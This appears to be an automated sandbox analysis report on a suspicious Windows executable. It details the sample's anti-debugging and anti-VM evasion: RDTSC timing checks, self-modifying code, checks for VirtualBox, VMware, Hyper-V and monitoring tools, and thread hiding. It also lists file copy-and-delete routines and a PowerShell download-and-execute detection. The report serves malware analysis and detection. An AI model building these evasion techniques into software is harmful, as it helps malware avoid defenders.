Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E06C0 second address: 9E06DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jo 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E06DC second address: 9E06FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FFBC8B2DA9Eh 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E06FD second address: 9E0722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC91A3BDEh 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FFBC91A3BD6h 0x00000013 pop esi 0x00000014 ja 00007FFBC91A3BDCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E087B second address: 9E08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFBC8B2DA96h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E08A2 second address: 9E08AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E08AE second address: 9E08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e je 00007FFBC8B2DA96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E08CE second address: 9E08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A54 second address: 9E0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC8B2DA9Ch 0x0000000a popad 0x0000000b jo 00007FFBC8B2DAC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A70 second address: 9E0A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A74 second address: 9E0A7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0A7A second address: 9E0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FFBC91A3BD6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E142D second address: 9E1433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3131 second address: 9E3137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3137 second address: 9E313B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E313B second address: 9E3149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F22 second address: 9E2F3D instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 jmp 00007FFBC8B2DAA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F3D second address: 9E2F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F47 second address: 9E2F4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F4D second address: 9E2F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F69 second address: 9E2F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F6D second address: 9E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2F88 second address: 9E2FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DA9Bh 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 jp 00007FFBC8B2DA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C1A second address: 9E5C24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C24 second address: 9E5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FFBC8B2DA96h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E58DE second address: 9E58E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F425C second address: 9F4260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F4260 second address: 9F426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02FD7 second address: A02FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02FDD second address: A02FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FFBC91A3BD6h 0x0000000d jmp 00007FFBC91A3BE5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02FFF second address: A03005 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A03005 second address: A0302F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC91A3BE8h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FFBC91A3BD6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02B41 second address: A02B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A126A3 second address: A126B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A12AF2 second address: A12B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A12F85 second address: A12FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A12FA8 second address: A12FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13129 second address: A13145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FFBC91A3BE6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13467 second address: A1346E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1360C second address: A13614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17CAF second address: A17D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FFBC8B2DA98h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D2C77h] 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FFBC8B2DA98h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 call 00007FFBC8B2DA99h 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D0B second address: A17D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FFBC91A3BD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D1A second address: A17D3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FFBC8B2DA9Eh 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FFBC8B2DA96h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D3F second address: A17D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007FFBC91A3BD6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FFBC91A3BD6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D59 second address: A17D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D69 second address: A17D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17F94 second address: A17FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFBC8B2DAA6h 0x0000000f nop 0x00000010 sub dx, 1A78h 0x00000015 push dword ptr [ebp+122D2A3Bh] 0x0000001b mov dx, 1DFCh 0x0000001f push 1C538DC7h 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pushad 0x00000028 popad 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A198A4 second address: A198AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A198AE second address: A198D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A198D7 second address: A198FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 jc 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FFBC91A3BDFh 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1949C second address: A194A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A194A5 second address: A194B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007FFBC91A3BD6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C037C second address: 51C0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03C8 second address: 51C03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03CC second address: 51C03D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03D2 second address: 51C0451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dh, C0h 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFBC91A3BE3h 0x0000001b sbb cx, E4BEh 0x00000020 jmp 00007FFBC91A3BE9h 0x00000025 popfd 0x00000026 mov di, cx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushad 0x0000002e call 00007FFBC91A3BE6h 0x00000033 pop eax 0x00000034 call 00007FFBC91A3BDBh 0x00000039 pop esi 0x0000003a popad 0x0000003b movsx edx, ax 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0451 second address: 51C046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C046E second address: 51C0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0474 second address: 51C0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 791BA3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 791AD2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 931174 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 93158E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 92FDF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9BBE28 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005438B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00544910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0053E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00544570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0053ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005316D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00543EA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00531160 GetSystemInfo,ExitProcess,

0_2_00531160

Source: file.exe, file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware@
Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWGe>
Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005345C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005345C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00549860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549750 mov eax, dword ptr fs:[00000030h]

0_2_00549750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00547850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00549600

Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: file.exe	Binary or memory string: y Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00547B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

